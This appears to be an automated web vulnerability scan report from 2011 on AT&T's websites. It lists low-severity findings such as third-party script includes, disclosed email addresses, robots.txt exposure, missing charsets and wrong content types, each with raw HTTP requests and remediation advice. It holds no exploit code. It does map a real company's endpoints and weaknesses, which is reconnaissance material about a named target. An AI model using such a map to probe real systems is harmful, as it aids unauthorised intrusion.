<a target="_blank" href="https://www.bbb.org/online/consumer/cks.aspx?id=110020911221"><img title="Click to verify BBB accreditation and to see a BBB report." alt="Click to verify BBB accreditation and to see a BBB report." src="//www.att.com/media/att/2011/global/nav/en_US/logoBBB.png"></a>
<a target="_blank" href="http://clicktoverify.truste.com/pvr.php?page=validate&companyName=AT%26T&sealid=101"><img title="This site is certified by TRUSTe" alt="This site is certified by TRUSTe" src="//www.att.com/media/att/2011/global/nav/en_US/logoTRUSTe.png"></a>
<a target="_blank" href="http://www.realpageslive.com/"><img title="Digital White and Yellow Pages" alt="Digital White and Yellow Pages" src="//www.att.com/media/att/2011/global/nav/en_US/logoDigitalWhiteYellowPages.png"> ...[SNIP]...
GET /coverageviewer/?type=voice HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
The response dynamically includes the following scripts from other domains:
http://www.bellsouth.com/scripts/hbx.js
http://www.bellsouth.com/scripts/hbx2.js
Request
GET /accounts/ HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Pragma: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Date: Tue, 06 Sep 2011 11:07:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=6AD5F370D87810D8B13BE982F040DE5E; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:07:32 GMT; path=/ Content-Length: 45366
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <title>Manage Your AT&T Accounts - View & ...[SNIP]... <!-- //END VS REFERENCE PAGE TAG --> <script language="javascript" src="//www.bellsouth.com/scripts/hbx2.js" type="text/javascript"></script> ...[SNIP]... </script> <script language="javascript" src="//www.bellsouth.com/scripts/hbx.js" type="text/javascript"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /esupport/article.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /gen/landing-pages?wtSlotClick=1-0062GT-0-4&pid=6080 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Tue, 06 Sep 2011 11:07:29 GMT Content-Length: 21286 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en ...[SNIP]... </script> <script src="http://platform.twitter.com/anywhere.js?id=Rc9v04Pwuci6YhDGrfbuA&v=1"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://www.bkrtx.com/js/bk-static.js
Request
GET /gen/landing-pages?pid=9213 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:29 GMT Content-Length: 28750 Connection: close Set-Cookie: DTAB=Tab=Bus; Expires=Mon, 05 Dec 2011 11:07:28 GMT; Path=/; Domain=.att.com
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <he ...[SNIP]... </iframe> <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script> ...[SNIP]...
GET /gen/press-room?wtSlotClick=1-0062GT-0-3&pid=2943 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33607
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/ ...[SNIP]... </script> <script src="http://platform.twitter.com/anywhere.js?id=Rc9v04Pwuci6YhDGrfbuA&v=1"></script> ...[SNIP]... <!-- START CONTENT AREA -->
GET /gen/privacy-policy?pid=2587 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: IBM_HTTP_Server Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/html;charset=ISO-8859-1 Content-Language: en Date: Tue, 06 Sep 2011 11:07:31 GMT Content-Length: 13043 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/ ...[SNIP]... </script> <script src="http://platform.twitter.com/anywhere.js?id=Rc9v04Pwuci6YhDGrfbuA&v=1"></script> ...[SNIP]... <!-- START CONTENT AREA -->
HTTP/1.1 200 OK Server: Apache P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 Content-Length: 95447 Date: Tue, 06 Sep 2011 11:09:04 GMT Connection: close Set-Cookie: TLTHID=A1826430D87810D8CFDA87CC26200058; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:09:04 GMT; path=/
...[SNIP]... <!-- Required for slider operation: See http://docs.jquery.com/UI/Slider for documentation --> <script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script> ...[SNIP]...
GET /shop/wireless/devices/lg-thrill-4g.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://static.meteorsolutions.com/metsol.js
Request
GET /shop/wireless/plans/messaging-plans.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html lang="en"> <head> <title>AT&T Messaging Unlimited Plan - Mobile to An ...[SNIP]... <link rel="stylesheet" type="text/css" href="/global/styles/baynote-guide.css" /> <script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script> ...[SNIP]...
The response dynamically includes the following script from another domain:
http://static.meteorsolutions.com/metsol.js
Request
GET /u-verse/explore/default.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://static.meteorsolutions.com/metsol.js
Request
GET /u-verse/explore/internet-landing.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://static.meteorsolutions.com/metsol.js
Request
GET /u-verse/shop/index.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/accessories/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phone-plans/data-connect-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phone-plans/family-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phone-plans/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phone-plans/individual-cell-phone-plans.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phones/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phones/cell-phones.jsp?wtSlotClick=1-005Y6F-0-1&feacondition=allphones&feaavailable=allphones&feafree=free&feapaytype=standard&startFilter=false&allTypes=on&allManus=on HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phones/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/cell-phones/pda-phones-smartphones.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/go-phones/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/packages/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/services/index.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/specials/netbooks.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /cell-phone-service/transfer-your-number/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /coverageviewer/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response dynamically includes the following script from another domain:
http://static.meteorsolutions.com/metsol.js
Request
GET /learn/ringtones-downloads/myatt-mobile.jsp HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref=""/w3c/p3p.xml"", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA GOV" X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Expires: Tue, 06 Sep 2011 11:06:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Tue, 06 Sep 2011 11:06:20 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: TLTHID=3FF116BCD87810D85528BCD4C2B001A1; Path=/; Domain=.att.com Set-Cookie: ECOM_GTM=owbth_NA_NA_NA_ostdbth; domain=.att.com; expires=Wednesday, 05-Sep-2012 11:06:20 GMT; path=/ Content-Length: 54761
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"> <head> <title>Account Management App - myAT&T Mobile - W ...[SNIP]... </script>
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
...[SNIP]... ".formErrorMessage p").text(""); // jQuery doesn't like this. Use instead: jQuery("#divUverse .formErrorMessage:first p").text("Please check that your email address is in valid format. (Example: jane@att.net)"); thisUserInput.closest('fieldset').prev(".formErrorMessage").show(); thisUserInput.closest('fieldset').children('.userInputNote').hide(); } // remove error classes if we have ...[SNIP]...
jQuery("#divUverse span.textInput-wrapper span:first").addClass("error"); jQuery("#divUverse .formErrorMessage:first p").text("Please check that your email address is in valid format. (Example: john@att.net)"); jQuery("#divUverse .formErrorMessage:first").show(); submitUverseValidEmailFailed=true; } else if (passwordInput == '') { // check whether password field is empty jQuery("#passUverse ...[SNIP]...
// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+ // Copyright (c) 2011 Jack Moore - jack@colorpowered.com // Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php (function ($, document, window) { var // ColorBox Default Settings. // See http://colorpowered.com/colorb ...[SNIP]...
/*merged jquery.validate.min.js and jquery.jcarousel.min.js to reduce number of request, these two files files always required on all pages */ /** * jQuery Validation Plugin 1.8.0 * * http://ba ...[SNIP]... <brian@cherne.net> ...[SNIP]...
The following email address was disclosed in the response:
johnsmith@att.net
Request
GET /eos/unauth/eosLogin?wtSlotClick=1-006E1J-0-1&productType=uverse HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/Ma ...[SNIP]... <span class="tips" id="memberIdHover">Your Member ID is your full AT&T U-verse email address (example: johnsmith@att.net). It's the same email address you use to log in to your AT&T U-verse online account manager to view or pay bills.</span> ...[SNIP]...
The following email address was disclosed in the response:
Name@att.net
Request
GET /olam/forgotPasswordAction.olamexecute?forgotPasswordActionEvent=forgotPasswordStep1 HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following email address was disclosed in the response:
name@domain.com
Request
GET /olam/registrationAction.olamexecute HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
...[SNIP]... r wirelesss phone number can contain only numbers. Please verify that the phone number was entered correctly.";
map['MemberIDFormatErrorMessage'] = "Your U-verse member ID should be in this format: name@domain.com";
map['NumberOfCharactersBeforeTheAtSymbolInYourUverseMemberIDCannotBeMoreThan20'] = "The number of characters before the @ in your U-verse member ID cannot be more than 20.";
/************************** Set the Global Nav Settings ***************************/ if(window.location.host != "www.att.com"){ var customGlobalNavResources = { userInfo: "user_info.txt",
// ColorBox v1.3.16 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+ // Copyright (c) 2011 Jack Moore - jack@colorpowered.com // Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php (function ($, document, window) { var // ColorBox Default Settings. // See http://colorpowered.com/colorb ...[SNIP]...
/* carl@criticalmass.com */ function BaseLibrary(){ var t = this; var v = navigator.appVersion.toLowerCase(), u = navigator.userAgent.toLowerCase(), n = navigator.appName; var d = document; t.ua = new Object(); t.u ...[SNIP]...
14. Robots.txt filepreviousnext There are 3 instances of this issue:
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.
The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Thu, 01 Sep 2011 20:16:52 GMT ETag: "356f72-660-ece37500" Accept-Ranges: bytes Content-Length: 1632 P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/plain Date: Tue, 06 Sep 2011 11:04:18 GMT Connection: close
HTTP/1.0 200 OK Server: IBM_HTTP_Server Last-Modified: Thu, 01 Sep 2011 20:16:52 GMT ETag: "356f72-660-ece37500" Accept-Ranges: bytes Content-Length: 1632 P3P: policyref="http://www.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV" Content-Type: text/plain Date: Tue, 06 Sep 2011 11:10:59 GMT Connection: close
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
(function($) { $.fn.ellipsis = function(enableUpdating){ var s = document.documentElement.style; if (!('textOverflow' in s || 'OTextOverflow' in s)) { return this.each(function(){ var el = ...[SNIP]...
window.onload = function () { var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1; if(is_chrome){ var rel = document.getElementById('forme').toBeReloaded.value; //get the c ...[SNIP]...
// JavaScript Document /*! * JavaScripts related to feedback section of the search result page (ECOM1011-10). * * - Character counter scripts for feedback text area * - Hide/Show feedback sec ...[SNIP]...
// Tooltips Class // A superclass to work with simple CSS selectors var Tooltips = Class.create(); Tooltips.prototype = { initialize: function(selector, options) { var tooltips = $$(selector); ...[SNIP]...
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
(function($) { $.fn.ellipsis = function(enableUpdating){ var s = document.documentElement.style; if (!('textOverflow' in s || 'OTextOverflow' in s)) { return this.each(function(){ var el = ...[SNIP]...
window.onload = function () { var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1; if(is_chrome){ var rel = document.getElementById('forme').toBeReloaded.value; //get the c ...[SNIP]...
// JavaScript Document /*! * JavaScripts related to feedback section of the search result page (ECOM1011-10). * * - Character counter scripts for feedback text area * - Hide/Show feedback sec ...[SNIP]...
// Tooltips Class // A superclass to work with simple CSS selectors var Tooltips = Class.create(); Tooltips.prototype = { initialize: function(selector, options) { var tooltips = $$(selector); ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/plain; charset=UTF-8
The response states that it contains plain text. However, it actually appears to contain JSON.
Request
GET /globalnav/resources/json/GlobalnavLinksInJsonString.txt HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The response contains the following Content-type statement:
Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /homepage/contentItemDroplet.jsp HTTP/1.1 Host: www.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
// Provide a default path to dwr.engine if (dwr == null) var dwr = {}; if (dwr.engine == null) dwr.engine = {}; if (DWREngine == null) var DWREngine = dwr.engine;
// Provide a default path to dwr.engine if (dwr == null) var dwr = {}; if (dwr.engine == null) dwr.engine = {}; if (DWREngine == null) var DWREngine = dwr.engine;
The response contains the following Content-type statement:
Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/video_progressive/gvp/mp4/ HTTP/1.1 Host: www.wireless.att.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 5717 Last-Modified: Fri, 26 Aug 2011 20:32:22 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" x-powered-by: Servlet/2.5 JSP/2.1 Date: Tue, 06 Sep 2011 11:15:13 GMT Connection: keep-alive
var req; var elementToUpdate;
function retrieveURL(url, nameOfFormToPost, elementId) { //get the (form based) params to push up as part of the get request //url = url + getFormAsString(nameOfFor ...[SNIP]...
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 19030 Last-Modified: Fri, 26 Aug 2011 20:32:20 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" x-powered-by: Servlet/2.5 JSP/2.1 Date: Tue, 06 Sep 2011 11:15:13 GMT Connection: keep-alive
// name - name of the cookie // value - value of the cookie // [expires] - expiration date of the cookie (defaults to end of current session) // [path] - path for which the cookie is valid (defaults t ...[SNIP]...
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 35224 Last-Modified: Fri, 26 Aug 2011 20:32:22 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" x-powered-by: Servlet/2.5 JSP/2.1 Date: Tue, 06 Sep 2011 11:15:10 GMT Connection: keep-alive
function gvpUtils() { var W3C = (!document.all && document.getElementById); var IE = (document.all); var ns4 = (document.layers); var v_debug = false; var vMainInit = ''; var vBrowBackButStatus ...[SNIP]...
HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 126127 Last-Modified: Fri, 26 Aug 2011 20:32:20 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" x-powered-by: Servlet/2.5 JSP/2.1 Date: Tue, 06 Sep 2011 11:15:11 GMT Connection: keep-alive
/* Prototype JavaScript framework, version 1.6.0.2 * (c) 2005-2008 Sam Stephenson * * Prototype is freely distributable under the terms of an MIT-style license. * For details, see the Prototyp ...[SNIP]...
The server presented a valid, trusted SSL certificate. This issue is purely informational.
The server presented the following certificates:
Server certificate
Issued to:
*.att.com,ST=Washington
Issued by:
Akamai Subordinate CA 3
Valid from:
Wed Jun 29 17:51:43 GMT-06:00 2011
Valid to:
Fri Jun 29 17:51:43 GMT-06:00 2012
Certificate chain #1
Issued to:
Akamai Subordinate CA 3
Issued by:
GTE CyberTrust Global Root
Valid from:
Thu May 11 09:32:00 GMT-06:00 2006
Valid to:
Sat May 11 17:59:00 GMT-06:00 2013
Certificate chain #2
Issued to:
GTE CyberTrust Global Root
Issued by:
GTE CyberTrust Global Root
Valid from:
Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:
Mon Aug 13 17:59:00 GMT-06:00 2018
Issue background
SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.Report generated by XSS.CX at Tue Sep 06 10:20:48 GMT-06:00 2011.